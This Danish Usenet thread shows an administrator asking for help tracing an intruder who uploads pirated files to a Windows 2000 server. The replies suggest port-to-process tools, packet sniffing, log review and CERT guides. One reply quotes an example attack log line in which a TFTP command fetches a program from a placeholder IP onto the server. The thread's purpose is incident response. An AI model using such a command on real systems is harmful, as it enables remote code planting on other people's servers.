---

Hej NG!

Jeg har en server stående ude i byen, som pt. ikke er beskyttet af firewall.
Der har i den seneste uges tid været en ubuden gæst på besøg, som har
uploadet en masse film, programmer, spil og musik til serverens c:\recycled
bibliotek.

Jeg var så heldig at fange ham "in the act" her iaften, men kan ikke rigtigt
komme til at se, hvordan han kommer ind...

Der er ingen aktive sessions i IIS' FTP service, og der er ingen shares i
brug (opdagede lige, at sharing var slået til - heldigvis er det kun en
udviklingsserver.)
Hvilke andre muligheder har jeg, som jeg skal undersøge næste gang jeg ser
ham igang med at uploade?

På forhånd tak.

--
Mvh. Jesper

---

> Hvilke andre muligheder har jeg, som jeg skal undersøge næste gang jeg ser
> ham igang med at uploade?

Skulle måske lige sige, at det er en Windows 2000 Server med alle service
packs og patches installeret.

--
Mvh. Jesper

---

Jesper Nielsen <jn@nielsenit.dk>, wrote in
<news:86bJ9.63109$HU.4644024@news010.worldonline.dk>:

> Hvilke andre muligheder har jeg, som jeg skal undersøge næste gang jeg ser
> ham igang med at uploade?

Kig i dine IIS logfiler og se om han har kastet nogle "kryptiske" kommandoer
mod serveren.

--
Anders Lund - spam2002@andersonline.dk
OE-QuoteFix - Et Outlook Express must - http://flash.to/oe-quotefix

---

> Kig i dine IIS logfiler og se om han har kastet nogle "kryptiske"
kommandoer
> mod serveren.

Puha - 500 MB logfiler senere...
Der er kun de sægvanlige nimda og code red forsøg, som ikke bidder på vores
server.

--
Mvh. Jesper

---

> Kig i dine IIS logfiler og se om han har kastet nogle "kryptiske"
kommandoer
> mod serveren.

Puha - 500 MB logfiler senere...
Der er kun de sægvanlige nimda og code red forsøg, som ikke bidder på vores
server.

--
Mvh. Jesper

---

In article <86bJ9.63109$HU.4644024@news010.worldonline.dk>, Jesper Nielsen wrote:
> Hej NG!
>
> Jeg har en server stående ude i byen, som pt. ikke er beskyttet af firewall.
> Der har i den seneste uges tid været en ubuden gæst på besøg, som har
> uploadet en masse film, programmer, spil og musik til serverens c:\recycled
> bibliotek.
>
> Jeg var så heldig at fange ham "in the act" her iaften, men kan ikke rigtigt
> komme til at se, hvordan han kommer ind...
>
> Der er ingen aktive sessions i IIS' FTP service, og der er ingen shares i
> brug (opdagede lige, at sharing var slået til - heldigvis er det kun en
> udviklingsserver.)
> Hvilke andre muligheder har jeg, som jeg skal undersøge næste gang jeg ser
> ham igang med at uploade?

netstat -an

fortæller hans IP, og hvilken port han er på.

Jeg ved ikke om man kan få lsof til cygwin.

--
To get blacklisted please mail to listme@listme.dsbl.org
Writing to the above address will blacklist your mailserver.
Hvis du skriver til ovenstående e-mail bliver din mailserver blacklistet.

---

> netstat -an

Den brugte jeg igår, og jeg lagde mærke til, at port 7411 og 7412 var i brug
af samme person før og efter en genstart - er det evt. en trojan?

Jeg kan ikke finde ovenstående porte i IANA's portoversigt.

--
Mvh. Jesper

---

In article <fHpJ9.63324$HU.4719791@news010.worldonline.dk>, Jesper Nielsen wrote:
>> netstat -an
>
> Den brugte jeg igår, og jeg lagde mærke til, at port 7411 og 7412 var i brug
> af samme person før og efter en genstart - er det evt. en trojan?
>
> Jeg kan ikke finde ovenstående porte i IANA's portoversigt.

Det kunne være tilfældige portnumre, det vælges nemlig hvis der åbnes
en forbindelse fra din maskine og ud.

Der findes gratis software der kan fortælle dig hvilket program der
bruger hvilken port. Kan ikke lige huske navnet.

lsof virker på unix :)

--
To get blacklisted please mail to listme@listme.dsbl.org
Writing to the above address will blacklist your mailserver.
Hvis du skriver til ovenstående e-mail bliver din mailserver blacklistet.

---

"Povl H. Pedersen" <povlhp@povl-h-pedersens-computer.local> wrote in
news:slrnavco7a.ge.povlhp@povl-h-pedersens-computer.local:

> In article <fHpJ9.63324$HU.4719791@news010.worldonline.dk>, Jesper
> Nielsen wrote:
>>> netstat -an
>>
>> Den brugte jeg igår, og jeg lagde mærke til, at port 7411 og 7412 var
>> i brug af samme person før og efter en genstart - er det evt. en
>> trojan?
[snip]
> Der findes gratis software der kan fortælle dig hvilket program der
> bruger hvilken port. Kan ikke lige huske navnet.

fport fra foundstone labs.

--
Knud

---

Jesper Nielsen skrev:

>> netstat -an

> Den brugte jeg igår, og jeg lagde mærke til, at port 7411 og 7412 var
> i brug af samme person før og efter en genstart - er det evt. en
> trojan?

Active Ports fra <URL: http://www.protect-me.com/freeware.html >, kan
fortælle dig hvilke programmer der benytter hvilke porte.
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >

---

> Active Ports fra <URL: http://www.protect-me.com/freeware.html >, kan
> fortælle dig hvilke programmer der benytter hvilke porte.

Thanx

--
Mvh. Jesper

---

Jesper Nielsen <jn@nielsenit.dk> wrote:
> Hej NG!
>
> Jeg har en server stående ude i byen, som pt. ikke er beskyttet af firewall.

I netop dette tilfaelde vil en firewall ikke goere en forskel -- medmindre
du har mulighed for at begraense f.eks. FTP adgang til netop jeres egen
IP adresse.

> Der er ingen aktive sessions i IIS' FTP service, og der er ingen shares i
> brug (opdagede lige, at sharing var slået til - heldigvis er det kun en
> udviklingsserver.)

> Hvilke andre muligheder har jeg, som jeg skal undersøge næste gang jeg ser
> ham igang med at uploade?

Du kan bruge windump til at se paa netvaerkstrafikken. Jeg vil gaette
paa, at han har installeret sin egen ftp server. Hvordan han er kommet
ind hvis maskinen har vaeret patched ved jeg saa ikke, men det er
selvfoelgelig muligt at man har glemt en patch.

Medmindre du har taenkt dig at retsforfoelge ham vil jeg raade dig til
at tage maskinen ned med det samme, og overbevise ledelsen om at kun
maskiner i produktion skal vaere offenligt tilgaengelige; resten skal
staa paa jeres eget LAN.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

---

> Du kan bruge windump til at se paa netvaerkstrafikken. Jeg vil gaette
> paa, at han har installeret sin egen ftp server. Hvordan han er kommet
> ind hvis maskinen har vaeret patched ved jeg saa ikke, men det er
> selvfoelgelig muligt at man har glemt en patch.
>

Det kan jo også være at han er offer for et endnu ikke offentlig gjort
exploit.
../Morten

---

> I netop dette tilfaelde vil en firewall ikke goere en forskel -- medmindre
> du har mulighed for at begraense f.eks. FTP adgang til netop jeres egen
> IP adresse.

Tjoeh, det burde det vel - luk for alle andre porte end dem der faktisk skal
bruges - port 20, 21, 80 samt terminal services (men kun fra egne IP
adresser). Så skal hackeren (eller hvad man nu skal kalde ham) bruge en
exploit i et af de installerede programmer.

Der var ingen aktive sessions på IIS' FTP service eller shares.


> > Hvilke andre muligheder har jeg, som jeg skal undersøge næste gang jeg
ser
> > ham igang med at uploade?
>
> Du kan bruge windump til at se paa netvaerkstrafikken. Jeg vil gaette
> paa, at han har installeret sin egen ftp server. Hvordan han er kommet
> ind hvis maskinen har vaeret patched ved jeg saa ikke, men det er
> selvfoelgelig muligt at man har glemt en patch.

Kigger lige lidt på det.


> Medmindre du har taenkt dig at retsforfoelge ham vil jeg raade dig til
> at tage maskinen ned med det samme, og overbevise ledelsen om at kun
> maskiner i produktion skal vaere offenligt tilgaengelige; resten skal
> staa paa jeres eget LAN.

Jeg har skam tænkt mig at retsforfølge ham langt ned i helvede - bare en
skam, at politiet ikke lige kunne komme med nogle gode forslag til, hvordan
jeg kunne fange ham.

Indtil videre lader jeg ham lege med serveren og uploade alt det han vil,
indtil jeg har skaffet de nødvendige beviser næste gang han udnytter
serveren (det har stået på hver dag den sidste uges tid).

Som sagt tidligere lagde jeg mærke til, at port 7411 og 7412 var i brug af
samme person før og efter en genstart, og jeg mistænker derfor disse porte
og dén bruger.

--
Mvh. Jesper

---

> I netop dette tilfaelde vil en firewall ikke goere en forskel -- medmindre
> du har mulighed for at begraense f.eks. FTP adgang til netop jeres egen
> IP adresse.

Tjoeh, det burde det vel - luk for alle andre porte end dem der faktisk skal
bruges - port 20, 21, 80 samt terminal services (men kun fra egne IP
adresser). Så skal hackeren (eller hvad man nu skal kalde ham) bruge en
exploit i et af de installerede programmer.

Der var ingen aktive sessions på IIS' FTP service eller shares.


> > Hvilke andre muligheder har jeg, som jeg skal undersøge næste gang jeg
ser
> > ham igang med at uploade?
>
> Du kan bruge windump til at se paa netvaerkstrafikken. Jeg vil gaette
> paa, at han har installeret sin egen ftp server. Hvordan han er kommet
> ind hvis maskinen har vaeret patched ved jeg saa ikke, men det er
> selvfoelgelig muligt at man har glemt en patch.

Kigger lige lidt på det.


> Medmindre du har taenkt dig at retsforfoelge ham vil jeg raade dig til
> at tage maskinen ned med det samme, og overbevise ledelsen om at kun
> maskiner i produktion skal vaere offenligt tilgaengelige; resten skal
> staa paa jeres eget LAN.

Jeg har skam tænkt mig at retsforfølge ham langt ned i helvede - bare en
skam, at politiet ikke lige kunne komme med nogle gode forslag til, hvordan
jeg kunne fange ham.

Indtil videre lader jeg ham lege med serveren og uploade alt det han vil,
indtil jeg har skaffet de nødvendige beviser næste gang han udnytter
serveren (det har stået på hver dag den sidste uges tid).

Som sagt tidligere lagde jeg mærke til, at port 7411 og 7412 var i brug af
samme person før og efter en genstart, og jeg mistænker derfor disse porte
og dén bruger.

--
Mvh. Jesper

---

"Jesper Nielsen" <jn@nielsenit.dk> wrote in message
news:1NpJ9.63326$HU.4720645@news010.worldonline.dk...
>
> Der var ingen aktive sessions på IIS' FTP service eller shares.
>

Har serveren altid været patchet?

Hvad med tftp? Kommandolinie program med ftp egenskaber. Den gang man kunne
fyre kommandoer af mod cmd shellen fra IIS var det populært at bruge tftp
til at overføre filer til serveren. En sådan kommando kunne se sådan ud i en
log fil:

tftp%20i%20[IP]%20GET%20program%20[sti til program]


> Som sagt tidligere lagde jeg mærke til, at port 7411 og 7412 var i brug af
> samme person før og efter en genstart, og jeg mistænker derfor disse porte
> og dén bruger.

Brug TCPView fra sysinternals
(http://www.sysinternals.com/ntw2k/source/tcpview.shtml) det viser hvilke
processer der bruger hvilke porte.

Set Audit op på de folder som lømlen bruger. Kør virus scan eller anden scan
for a finde trojanere.

Scan alle logfiler igennem, IIS log, FTP log og eventuelle database logs.
Det er det eneste håndgriblige bevis du har, når du skal retsforfølge
teenageren der har gennembrudt jeres sikkerhed.

--

---

> Hvad med tftp? Kommandolinie program med ftp egenskaber. Den gang man
kunne
> fyre kommandoer af mod cmd shellen fra IIS var det populært at bruge tftp
> til at overføre filer til serveren. En sådan kommando kunne se sådan ud i
en
> log fil:
>
> tftp%20i%20[IP]%20GET%20program%20[sti til program]

Det er vist nimda eller code red, ikke?
Serveren er opsat EFTER disse worms, og blev patchet inden serveren blev sat
op.


> Brug TCPView fra sysinternals
> (http://www.sysinternals.com/ntw2k/source/tcpview.shtml) det viser hvilke
> processer der bruger hvilke porte.

Kigger jeg lige på - thanx.


> Set Audit op på de folder som lømlen bruger. Kør virus scan eller anden
scan
> for a finde trojanere.

Har netop kørt endnu en full scan, og NAV finder intet...


> Scan alle logfiler igennem, IIS log, FTP log og eventuelle database logs.

Findes der nogen tools til, som kan scanne sådanne logs igennem? Vores
webserver producerer ca. 500 MB logfiler om dagen for blot eet site...


> Det er det eneste håndgriblige bevis du har, når du skal retsforfølge
> teenageren der har gennembrudt jeres sikkerhed.

Eller mangel på samme

--
Mvh. Jesper

---

Jesper Nielsen skrev:

> Findes der nogen tools til, som kan scanne sådanne logs igennem? Vores
> webserver producerer ca. 500 MB logfiler om dagen for blot eet site...

Du kan sikkert finde noget brugbart på <URL: http://loganalysis.org/ >.
Kig i mailinglistens arkiver: <URL: http://lists.shmoo.com/pipermail/loganalysis/ >
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >

---

"Jesper Nielsen" <jn@nielsenit.dk> wrote:

>Som sagt tidligere lagde jeg mærke til, at port 7411 og 7412 var i brug af
>samme person før og efter en genstart, og jeg mistænker derfor disse porte
>og dén bruger.

Virker 'netstat -a -o' paa en Win2000-maskine?

Paa XP giver kommandoen pid paa den proces, som har fat i porten,
og saa kan man i Windows Jobliste se navnet paa programmet ud fra
pid.

Eller skulle der efter sigende findes et program ved navn
ActivePorts, som kan det samme og vistnok lidt til.

Derudover boer da naturligvis ogsaa lade en pakkesniffer kigge
paa trafikken til de suspekte porte.


--
Allan Olesen, Lunderskov.
Danske musikere tjener penge ved ulovlig softwarekopiering.

---

Allan Olesen skrev:

> Virker 'netstat -a -o' paa en Win2000-maskine?

Ja.

> Paa XP giver kommandoen pid paa den proces, som har fat i porten,
> og saa kan man i Windows Jobliste se navnet paa programmet ud fra
> pid.

Man skal huske at tilføje PID i listen i Task Manager: fanebladet Pro-
cesses | View | Select Columns, jeg mener ikke at den vises som standard.
Man kan derudover få vist kolonnen med brugernavn, så man kan se om nogle
processer afvikles med ukendte brugernavne.
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >

---

> > Virker 'netstat -a -o' paa en Win2000-maskine?
>
> Ja.

Ikke hos mig...

---

"Jesper Nielsen" <jn@nielsenit.dk> wrote:

>> > Virker 'netstat -a -o' paa en Win2000-maskine?

>> Ja.

>Ikke hos mig...

Kan det maaske have noget med en servicepakke at goere?

Jeg glemte at checke paa min maskine paa arbejde i dag, ellers
kunne jeg maaske have bidraget til forvirringen.


--
Allan Olesen, Lunderskov.
Danske musikere tjener penge ved ulovlig softwarekopiering.

---

Jesper Nielsen skrev:

>>> Virker 'netstat -a -o' paa en Win2000-maskine?

>> Ja.

> Ikke hos mig...

Hmm, det virkede på WinXP Pro og på Windows.NET server RC1, så jeg gik
fejlagtigt ud fra at det også virkede på Windows 2000.

Jeg beklager forvirringen.

netstat -a -o virker heller ikke på Windows NT 4.
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >

---

Jesper Nielsen skrev:

> Der har i den seneste uges tid været en ubuden gæst på besøg

<URL: https://www.cert.dk/vejled/win2000nt.shtml >
<URL: https://www.cert.dk/vejled/reetabler.shtml >

Der er links til andre vejledninger på de ovennævnte websider.
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >